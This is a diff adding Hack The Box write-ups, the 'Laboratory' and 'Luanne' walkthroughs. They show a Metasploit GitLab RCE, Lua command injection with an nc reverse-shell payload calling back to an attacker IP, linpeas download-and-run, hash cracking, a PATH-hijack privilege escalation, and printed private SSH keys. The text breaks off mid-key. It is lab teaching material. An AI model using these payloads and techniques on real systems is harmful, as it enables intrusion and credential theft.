+ `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
+ ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
+ -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
+ -~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
+ :dopeAW.Noo :is:TЯiKC.sudo-.A:
+ :we're.all.alike'` The.PFYroy.No.D7:
+ :PLACEDRINKHERE!: yxp_cmdshell.Ab0:
+ :msf>exploit -j. :Ns.BOB&ALICEes7;:
+ :---srwxrwx:-.` `MS146.52.No.Per:
+ :<****script>.Ac816/ sENbove3101.404:
+ :NT_AUTHORITY.Do `T:/shSYSTEM-.N:
+ :09.14.2011.raid /STFU|wall.No.Pr:
+ :hevnsntSurb025N. dNVRGOING2GIVUUP:
+ :#OUTHOUSE- -s: /corykennedyData:
+ :$nmap -oS SSo.6178306Ence:
+ :Awsm.da: /shMTl#beats3o.No.:
+ :Ring0: `dDestRoyREXKC3ta/M:
+ :23d: sSETEC.ASTRONOMYist:
+ /- /yo- .ence.N:(){ :|: & };:
+ `:Shall.We.Play.A.Game?tron/
+ ```-ooy.if1ghtf0r+ehUser5`
+ ..th3.H1V3.U2VjRFNN.jMh+.`
+ `MjM~~WE.ARE.se~~MMjMs
+ +~KANSAS.CITY's~-`
+ J~HAKCERS~./.`
+ .esc:wq!:`
+ +++ATH`
+ `
+
+
+ =[ metasploit v6.0.46-dev ]
+ + -- --=[ 2135 exploits - 1139 auxiliary - 365 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: Use help to learn more
+ about any command
+
+ msf6 > search gitlab 12.8.1
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/multi/http/gitlab_file_read_rce 2020-03-26 excellent Yes GitLab File Read Remote Code Execution
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gitlab_file_read_rce
+
+ msf6 > use 0
+ [*] No payload configured, defaulting to generic/shell_reverse_tcp
+ msf6 exploit(multi/http/gitlab_file_read_rce) > show options
+
+
+
+Here we need to set the following options:
+
+
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set USERNAME test
+ USERNAME => test
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set PASSWORD testtest
+ PASSWORD => testtest
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set RHOSTS 10.10.10.216
+ RHOSTS => 10.10.10.216
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set VHOST git.laboratory.htb
+ VHOST => git.laboratory.htb
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set LHOST tun0
+ LHOST => tun0
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set SSL TRUE
+ [!] Changing the SSL option's value may require changing RPORT!
+ SSL => true
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set RPORT 443
+ RPORT => 443
+
+
+
+
+Then we run the exploit:
+
+
+ msf6 exploit(multi/http/gitlab_file_read_rce) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
+ [*] Executing automatic check (disable AutoCheck to override)
+ [+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
+ [*] Logged in to user test
+ [*] Created project /test/hPWfWdX6
+ [*] Created project /test/fh8BzMaY
+ [*] Created issue /test/hPWfWdX6/issues/1
+ [*] Executing arbitrary file load
+ [+] File saved as: '/home/nothing/.msf4/loot/20210605164827_default_10.10.10.216_gitlab.secrets_584759.txt'
+ [+] Extracted secret_key_base 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
+ [*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
+ [*] Attempting to delete project /test/hPWfWdX6
+ [*] Deleted project /test/hPWfWdX6
+ [*] Attempting to delete project /test/fh8BzMaY
+ [*] Deleted project /test/fh8BzMaY
+ [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.216:34148) at 2021-06-05 16:48:32 +0200
+
+ id
+ uid=998(git) gid=998(git) groups=998(git)
+ ls
+ ls -lash
+ total 8.0K
+ 4.0K drwx------ 2 git root 4.0K Jul 2 2020 .
+ 4.0K drwxr-xr-x 9 git root 4.0K Jun 5 05:52 ..
+ pwd
+ /var/opt/gitlab/gitlab-rails/working
+
+
+
+And there you go! We managed to get a reverse shell as the git user, now that we're here we see that we are inside the gitlab-rails/working directory, so let's run the **gitlab-rails console** command to get more information on the users:
+
+
+ git@git:~/gitlab-rails/working$ gitlab-rails console
+ gitlab-rails console
+
+ --------------------------------------------------------------------------------
+ GitLab: 12.8.1 (d18b43a5f5a) FOSS
+ GitLab Shell: 11.0.0
+ PostgreSQL: 10.12
+ --------------------------------------------------------------------------------
+ Loading production environment (Rails 6.0.2)
+ Switch to inspect mode.
+
+
+From here we type the following:
+
+
+
+ **user = User.find(1)**
+ user = User.find(1)
+ #<****User id:1 @dexter>
+
+Let's change dexter's password:
+
+
+ **user.password = 'testtest'**
+ user.password = 'testtest'
+ "testtest"
+
+
+
+Then save it:
+
+
+ **user.save!**
+ user.save!
+ Enqueued ActionMailer::DeliveryJob (Job ID: 23a1f04b-e090-47e5-8e6f-8bc0a4f515e2) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<****GlobalID:0x00007fb1bf9c1d78 @uri=# <****URI::GID gid://gitlab/User/1>>
+ true
+
+Now that's done let's login as the dexter user:
+
+
+
+And we're logged in as the Dexter user!
+
+
+
+Now let's take a look at his SecureDocker project:
+
+
+
+And we found a private SSH key! let's use to to see if we can login via SSH:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory]
+ → cat id_rsa
+ -----BEGIN OPENSSH PRIVATE KEY-----
+ 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
+ -----END OPENSSH PRIVATE KEY-----
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory]
+ → ssh dexter@laboratory.htb -i id_rsa
+ The authenticity of host 'laboratory.htb (10.10.10.216)' can't be established.
+ ECDSA key fingerprint is SHA256:XexmI3GbFIB7qyVRFDIYvKcLfMA9pcV9LeIgJO5KQaA.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'laboratory.htb,10.10.10.216' (ECDSA) to the list of known hosts.
+ dexter@laboratory:~$ id
+ uid=1000(dexter) gid=1000(dexter) groups=1000(dexter)
+ dexter@laboratory:~$ ls
+ user.txt
+ dexter@laboratory:~$ cat user.txt
+ 73XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to log onto the box as the dexter user and print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, let's get linpeas.sh on the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ dexter@laboratory:~$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ dexter@laboratory:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-05 15:08:55-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[======================================================================================================================================================>] 333.85K --.-KB/s in 0.1s
+
+ 2021-06-05 15:08:55 (2.23 MB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ dexter@laboratory:~$ chmod +x /tmp/peas.sh
+ dexter@laboratory:~$ /tmp/peas.sh
+
+
+
+` 
+
+Let it run, then scroll through the output, and you can see that there is a SUID binary in **/usr/local/bin/docker-security** :
+
+
+
+So let's make use of it:
+
+
+ dexter@laboratory:~$ echo "/bin/bash" > chmod
+ dexter@laboratory:~$ chmod +x chmod
+ dexter@laboratory:~$ export PATH=$PWD:$PATH
+ dexter@laboratory:~$ echo $PATH
+ /home/dexter:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/snap/bin
+ dexter@laboratory:~$ /usr/local/bin/docker-security
+ root@laboratory:~# id
+ uid=0(root) gid=0(root) groups=0(root),1000(dexter)
+ root@laboratory:~# cat /root/root.txt
+ 00XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/54.md b/Easy/54.md
new file mode 100644
index 0000000..4c40ec6
--- /dev/null
+++ b/Easy/54.md
@@ -0,0 +1,528 @@
+# Luanne Writeup
+
+
+
+## Introduction :
+
+Luanne is an Easy NetBSD box released back in November 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/3 ] [~/HTB]
+ → nmap -vvv -p- 10.10.10.218 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.218
+ Discovered open port 22/tcp on 10.10.10.218
+ Discovered open port 9001/tcp on 10.10.10.218
+
+ [ 10.0.0.10/16 ] [ /dev/pts/3 ] [~/HTB]
+ → nmap -sCV -p80,22,9001 10.10.10.218
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 08:52 CEST
+ Nmap scan report for 10.10.10.218
+ Host is up (0.027s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
+ | 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
+ |_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
+ 80/tcp open http nginx 1.19.0
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Basic realm=.
+ | http-robots.txt: 1 disallowed entry
+ |_/weather
+ |_http-server-header: nginx/1.19.0
+ |_http-title: 401 Unauthorized
+ 9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Basic realm=default
+ |_http-server-header: Medusa/1.12
+ |_http-title: Error response
+ Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 187.07 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+ 
+
+Here we don't have access yet, but we are hinted towards a certain local port 3000 that our nmap scan didn't pick up earlier. Now let's take a look at the Medusa service on port 9001:
+
+
+
+Now on the medusa service, we also have some basic auth with a different 401 response page. Not much here either, so let's move back to the port 80, on http-robots.txt there was the **./weather** directory disallowed entry, so let's run gobuster on it:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/3 ] [~/HTB]
+ → gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.218/weather/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/06/06 09:11:55 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /forecast (Status: 200) [Size: 90]
+
+
+
+And here we get the **/weather/forecast/** page so let's investigate it:
+
+
+
+Here we see that we should have specified a city, so let's send intercept request into burpsuite and test if there are any injections we can do:
+
+ 
+
+Let's list the cities as advised:
+
+ 
+
+So we are able to get the weather data of any city. But we don't know yet if the city input is sanitized, so let's try to escape it to cause an error:
+
+
+
+And now we have more info! We managed to pickup the fact that this is a .lua file located in **/usr/local/webapi/weather.lua** , now let's try to poke at it further to see if we have any command execution, to do so we need to comment out the rest of the line using **\--**
+
+
+
+Now from here let's try to inject other commands after the **;**
+
+
+
+Now we have been able to inject another command! However let's go further and attempt to use system commands:
+
+
+
+And that's it! We have access to system commands, so let's spawn a reverse shell with it now:
+
+
+ #our first RCE
+ GET /weather/forecast?city=London');print("\nnihilist777\n");os.execute("id")-- HTTP/1.1
+
+ #RCE with reverse shell payload
+ GET /weather/forecast?city=London');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9002 >/tmp/f")-- HTTP/1.1
+
+ #URL encoded reverse shell payload (just select it in burpsuite, and hit CTRL+U to URL-Encode)
+ GET /weather/forecast?city=London')%3bos.execute("rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.13+9002+>/tmp/f")-- HTTP/1.1
+
+ #prepare to catch the reverse shell with nc:
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+
+
+
+` 
+
+And we get a reverse shell connection!
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/27 ] [~/HTB/Luanne]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.218] 65436
+ sh: can't access tty; job control turned off
+
+ $ id
+ uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)
+
+ $ ls -lash
+ total 1.5K
+ 2.0K drwxr-xr-x 2 root wheel 512B Nov 25 2020 .
+ 2.0K drwxr-xr-x 24 root wheel 512B Nov 24 2020 ..
+ 2.0K -rw-r--r-- 1 root wheel 47B Sep 16 2020 .htpasswd
+ 2.0K -rw-r--r-- 1 root wheel 386B Sep 17 2020 index.html
+ 2.0K -rw-r--r-- 1 root wheel 78B Nov 25 2020 robots.txt
+
+
+Running a simple ls shows us that there's a **.htpasswd** file, so let's get it:
+
+
+ $ cat .htpasswd
+ webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
+
+
+
+Let's crack the hash using john locally:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → vim htpasswd.hash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
+
+ Possible Hashs:
+ [+] MD5(Unix)
+ --------------------------------------------------
+ HASH: ^C
+
+ Bye!
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → cat htpasswd.hash
+ $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → john htpasswd.hash -w=/usr/share/wordlists/rockyou.txt
+ Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
+ Use the "--format=md5crypt-long" option to force loading these as that type instead
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ **iamthebest (?)**
+ 1g 0:00:00:00 DONE (2021-06-06 10:40) 12.50g/s 38400p/s 38400c/s 38400C/s my3kids..ANTHONY
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And there we go we managed to get the **webapi_user** password **iamthebest** so let's login:
+
+ 
+
+Although that's too bad, the webapi_user isn't of much use yet. Back on our reverse shell, let's enumerate the box with linpeas.sh
+
+
+ $ wget -V
+ sh: wget: not found
+ $ curl -V
+ curl 7.71.0 (x86_64--netbsd) libcurl/7.71.0 OpenSSL/1.1.1d zlib/1.2.10 libidn2/2.3.0 nghttp2/1.41.0
+ Release-Date: 2020-06-24
+ Protocols: dict file ftp ftps gopher http https imap imaps pop3 pop3s rtsp smb smbs smtp smtps telnet tftp
+ Features: AsynchDNS GSS-API HTTP2 HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM NTLM_WB SPNEGO SSL TLS-SRP UnixSockets
+
+
+
+
+We're going to use curl to get **linpeas.sh** onto the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ $ curl http://10.10.14.13:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 856k 0 --:--:-- --:--:-- --:--:-- 853k
+ $ chmod +x /tmp/peas.sh
+ $ /tmp/peas.sh
+
+
+
+Also note how it cannot display the colored linpeas logo because we're not inside of bash:
+
+
+
+As you scroll through the linpeas output you see the following hint that we need to privesc to the r.micahels user:
+
+
+
+
+ $ ps auxw | grep http
+ _httpd 97 0.0 0.0 35256 2328 ? I 8:30AM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/
+ r.michaels 185 0.0 0.0 34996 1988 ? Is 6:50AM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home
+
+
+Since this is a localhost service running on port 3001, we're going to use curl from the box:
+
+
+ $ curl http://127.0.0.1:3001
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 199 100 199 0 0 99500 0 --:--:-- --:--:-- --:--:-- 99500
+
+
+
+ # 401 Unauthorized
+
+
+ /:
+
+
+ No authorization
+
+* * *
+
+[127.0.0.1:3001](//127.0.0.1:3001/)
+
+Since we get a 401 Unauthorized error, let's pass the credentials we found earlier as arguements:
+
+
+ $ curl http://127.0.0.1:3001/ --user webapi_user:iamthebest
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 386 100 386 0 0 77200 0 --:--:-- --:--:-- --:--:-- 77200
+
+
+
+
+
+
+ ### Weather Forecast API
+
+
+
+
+ #### List available cities:
+
+
+ [/weather/forecast?city=list](/weather/forecast?city=list)
+
+
+ #### Five day forecast (London)
+
+
+ [/weather/forecast?city=London](/weather/forecast?city=London)
+
+
+ * * *
+
+
+
+
+
+
+And here we see that the credentials worked ! Now let's try to get the **r.michael** user's private SSH key:
+
+
+ $ curl http://127.0.0.1:3001/~r.michaels/id_rsa --user webapi_user:iamthebest
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 2610 100 2610 0 0 637k 0 --:--:-- --:--:-- --:--:-- 637k
+ -----BEGIN OPENSSH PRIVATE KEY-----
+ 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
